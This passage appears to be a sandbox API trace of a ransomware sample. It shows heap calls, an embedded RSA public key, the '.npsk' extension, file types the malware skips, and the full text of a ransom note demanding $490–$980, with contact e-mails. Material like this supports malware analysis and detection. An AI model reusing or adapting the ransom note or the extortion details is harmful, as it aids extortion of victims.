KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0204.617] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d390 [0204.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x28) returned 0x32796d8 [0204.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3245110 [0204.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3245378 [0204.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x32455e0 [0204.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3245848 [0204.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3245ab0 [0204.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3245d18 [0204.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3245f80 [0204.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x32461e8 [0204.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3246450 [0204.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x32466b8 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x816) returned 0x325e940 [0204.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x3286578 [0204.618] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x28) returned 0x3279a08 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3246920 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3246b88 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3263728 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3263990 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3263bf8 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3263e60 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x32640c8 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3264330 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3264598 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3264800 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xa0) returned 0x809cc0 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x130) returned 0x322dd60 [0204.618] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x809cc0 | out: hHeap=0x750000) returned 1 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1d0) returned 0x32853a0 [0204.618] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x322dd60 | out: hHeap=0x750000) returned 1 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x2b7) returned 0x3256d70 [0204.618] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32853a0 | out: hHeap=0x750000) returned 1 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x412) returned 0x32547f0 [0204.618] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3256d70 | out: hHeap=0x750000) returned 1 [0204.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x61a) returned 0x7bb150 [0204.619] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32547f0 | out: hHeap=0x750000) returned 1 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x440) returned 0x32547f0 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1064) returned 0x3286da0 [0204.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32547f0, cbMultiByte=-1, lpWideCharStr=0x3286da0, cchWideChar=2098 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned 1075 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1070) returned 0x3287e10 [0204.619] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286da0 | out: hHeap=0x750000) returned 1 [0204.619] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32547f0 | out: hHeap=0x750000) returned 1 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x28) returned 0x3279888 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3264a68 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3264cd0 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3264f38 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x32651a0 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3265408 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3265670 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x32658d8 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3265b40 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3265da8 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3266010 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x80a) returned 0x325e940 [0204.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1029 | out: lpWideCharStr=".npsk") returned 6 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x3286da0 [0204.619] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x7b38f0 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x18) returned 0x32727c8 [0204.619] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x795dc8 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d7f0 [0204.620] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32727c8 | out: hHeap=0x750000) returned 1 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d460 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x48) returned 0x326f398 [0204.620] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d7f0 | out: hHeap=0x750000) returned 1 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3252e38 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d4c8 [0204.620] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x326f398 | out: hHeap=0x750000) returned 1 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x32409b0 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x90) returned 0x77e578 [0204.620] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x82d4c8 | out: hHeap=0x750000) returned 1 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240a08 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3252f58 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xd8) returned 0x31f0d20 [0204.620] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x77e578 | out: hHeap=0x750000) returned 1 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32855e0 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240b10 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d4c8 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x138) returned 0x3242df0 [0204.620] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31f0d20 | out: hHeap=0x750000) returned 1 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3252fa0 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240b68 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3240bc0 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3252fe8 [0204.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1c8) returned 0x3260d40 [0204.620] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3242df0 | out: hHeap=0x750000) returned 1 [0204.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b38f0 | out: hHeap=0x750000) returned 1 [0204.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x795dc8 | out: hHeap=0x750000) returned 1 [0204.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x82d460 | out: hHeap=0x750000) returned 1 [0204.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3252e38 | out: hHeap=0x750000) returned 1 [0204.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32409b0 | out: hHeap=0x750000) returned 1 [0204.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3240a08 | out: hHeap=0x750000) returned 1 [0204.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3252f58 | out: hHeap=0x750000) returned 1 [0204.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32855e0 | out: hHeap=0x750000) returned 1 [0204.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3240b10 | out: hHeap=0x750000) returned 1 [0204.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x82d4c8 | out: hHeap=0x750000) returned 1 [0204.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3252fa0 | out: hHeap=0x750000) returned 1 [0204.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x750000) returned 1 [0204.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3240bc0 | out: hHeap=0x750000) returned 1 [0204.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3252fe8 | out: hHeap=0x750000) returned 1 [0204.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3260d40 | out: hHeap=0x750000) returned 1 [0204.621] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x28) returned 0x3279a68 [0204.621] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3266278 [0204.621] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x32664e0 [0204.621] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3266748 [0204.621] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x32669b0 [0204.621] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3266c18 [0204.621] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3266e80 [0204.621] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x32670e8 [0204.621] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3267350 [0204.621] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3269728 [0204.621] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x25c) returned 0x3269990 [0204.621] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xa0) returned 0x809cc0 [0204.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x130) returned 0x322dd60 [0204.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x809cc0 | out: hHeap=0x750000) returned 1 [0204.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1d0) returned 0x32853a0 [0204.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x322dd60 | out: hHeap=0x750000) returned 1 [0204.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x2b7) returned 0x3256d70 [0204.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32853a0 | out: hHeap=0x750000) returned 1 [0204.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x412) returned 0x32547f0 [0204.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3256d70 | out: hHeap=0x750000) returned 1 [0204.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x61a) returned 0x32875b8 [0204.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32547f0 | out: hHeap=0x750000) returned 1 [0204.622] GetUserNameW (in: lpBuffer=0x18d8a0, pcbBuffer=0x18d714 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d714) returned 1 [0204.623] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x590) returned 0x325e940 [0204.623] GetLastError () returned 0x0 [0204.632] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.632] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.632] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x81e) returned 0x325e940 [0204.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1039 | out: lpWideCharStr="ntuser.dat.LOG1") returned 16 [0204.632] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x3289f88 [0204.632] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.632] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.632] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32727c8 | out: hHeap=0x750000) returned 1 [0204.632] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9e8 [0204.632] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.632] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.632] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9e8 | out: hHeap=0x750000) returned 1 [0204.632] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x81e) returned 0x325e940 [0204.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1039 | out: lpWideCharStr="ntuser.dat.LOG2") returned 16 [0204.632] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x328a7b0 [0204.632] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.632] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x48) returned 0x326f398 [0204.632] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.632] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.632] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.632] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.633] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x814) returned 0x325e940 [0204.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1034 | out: lpWideCharStr="ntuser.pol") returned 11 [0204.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x328afd8 [0204.633] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d4c8 [0204.633] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x326f398 | out: hHeap=0x750000) returned 1 [0204.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.633] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.633] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x808) returned 0x325e940 [0204.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1028 | out: lpWideCharStr=".sys") returned 5 [0204.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x328b800 [0204.633] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x90) returned 0x77e578 [0204.633] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x82d4c8 | out: hHeap=0x750000) returned 1 [0204.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.633] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.633] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x808) returned 0x325e940 [0204.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1028 | out: lpWideCharStr=".ini") returned 5 [0204.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x328c018 [0204.633] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x808) returned 0x325e940 [0204.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1028 | out: lpWideCharStr=".DLL") returned 5 [0204.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x328c830 [0204.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xd8) returned 0x31f0d20 [0204.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x77e578 | out: hHeap=0x750000) returned 1 [0204.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x808) returned 0x325e940 [0204.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1028 | out: lpWideCharStr=".dll") returned 5 [0204.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x328d048 [0204.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x808) returned 0x325e940 [0204.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1028 | out: lpWideCharStr=".blf") returned 5 [0204.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x328d860 [0204.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x808) returned 0x325e940 [0204.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1028 | out: lpWideCharStr=".bat") returned 5 [0204.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x328e078 [0204.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x138) returned 0x3242df0 [0204.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31f0d20 | out: hHeap=0x750000) returned 1 [0204.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d9b0 | out: hHeap=0x750000) returned 1 [0204.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x808) returned 0x325e940 [0204.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d6a0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1028 | out: lpWideCharStr=".lnk") returned 5 [0204.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x328e890 [0204.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d9b0 [0204.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3285b58 [0204.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3285b58 | out: hHeap=0x750000) returned 1 [0204.635] HeapFree (in: hHeap=0x750000, 